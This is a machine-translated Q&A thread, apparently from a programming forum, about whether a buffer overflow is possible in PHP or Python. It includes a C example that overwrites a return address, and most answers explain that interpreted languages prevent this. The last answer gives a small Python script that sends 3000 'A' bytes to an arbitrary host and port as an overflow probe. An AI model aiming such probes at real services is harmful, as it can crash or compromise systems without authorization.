Как провести переполнение буфера в PHP/Python?

Question

Как провести переполнение буфера в PHP/Python?

Вот пример в c:

#include <stdio.h>
#include <string.h>

void bad() {
    printf("Oh shit really bad~!\r\n");
}

void foo() {
    char overme[4] = "WOW";
    *(int*)(overme+8) = (int)bad;
}

int main() {
   foo();
}

8

python php buffer-overflow

Источник

user198729 17 янв '10 в 14:27

6 ответов

Другие вопросы по тегам python php buffer-overflow

user107366 17 янв '10 в 15:47 2010-01-17 15:47 · Answer 1 · 2010-01-17 15:47

Тот факт, что Python и PHP интерпретируются как предложенные другими, на самом деле не имеет значения. Дело в том, что почти все представленные ими API и языковая семантика тщательно проверяются на ошибки, что делает невозможным использование неопределенного поведения. Даже если вы скомпилируете языки, это все равно будет невозможно. Это не значит, что вы не можете предоставить небезопасные API, которые могут делать что угодно. Фактически, с помощью модуля Pythons ctypes можно создать похожее поведение, но значительно сложнее сделать это случайно.

user6899 17 янв '10 в 22:26 2010-01-17 22:26 · Answer 2 · 2010-01-17 22:26

Мы сожалеем: вы достигли слабости в Python. К сожалению, это сделано специально, так что с этим мало что можно сделать. Возможно, вам следует остаться с С.

Как сказал Мартин против Лёвиса:

Python не поддерживает переполнения буфера, извините.

PS Вау. Кажется, несколько месяцев назад я прочитал этот пост, и все же это было 7 лет и день.

user206302 17 янв '10 в 14:29 2010-01-17 14:29 · Answer 3 · 2010-01-17 14:29

Поскольку PHP является языком сценариев и не имеет указателей, а строковый тип является бинарно-безопасным, такие вещи не будут работать в PHP.

Но почему вы хотите сделать такую вещь?

(о, в PHP могут быть ошибки, приводящие к переполнению буфера, но на это нельзя полагаться ни в коем случае, и обычно это исправляется довольно быстро...)

user179235 17 янв '10 в 14:38 2010-01-17 14:38 · Answer 4 · 2010-01-17 14:38

Поскольку php,python и каждый интерпретируемый язык сначала должны проходить через интерпретатора, а у вас нет полного доступа к памяти, такие языки не позволят вам делать какие-то игры, такие как код, который вы опубликовали.

1

Источник

user179235 17 янв '10 в 14:38

user95135 17 янв '10 в 14:30 2010-01-17 14:30 · Answer 5 · 2010-01-17 14:30

Выполнение чего-либо подобного в PHP не приведет к такому же поведению.

PHP интерпретируется и всегда проверяет, является ли выполняемая вами операция действительной или нет. Таким образом, вы не можете, например, переполнить буфер.

1

Источник

user95135 17 янв '10 в 14:30

user6196507 19 май '17 в 17:38 2017-05-19 17:38 · Answer 6 · 2017-05-19 17:38

import sys
import socket

for carg in sys.argv:

    if carg == "-S":

        argnum= sys.argv.index(carg)

        argnum +=1

        host = sys.argv[argnum]

    elif carg == "-p":

        argnum = sys.argv.index(carg)

        argnum +=1

        port = sys.argv[argnum]

buffer = "\x41"* 3000

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

s.send("USV" + buffer)

s.close()

0

Источник

user6196507 19 май '17 в 17:38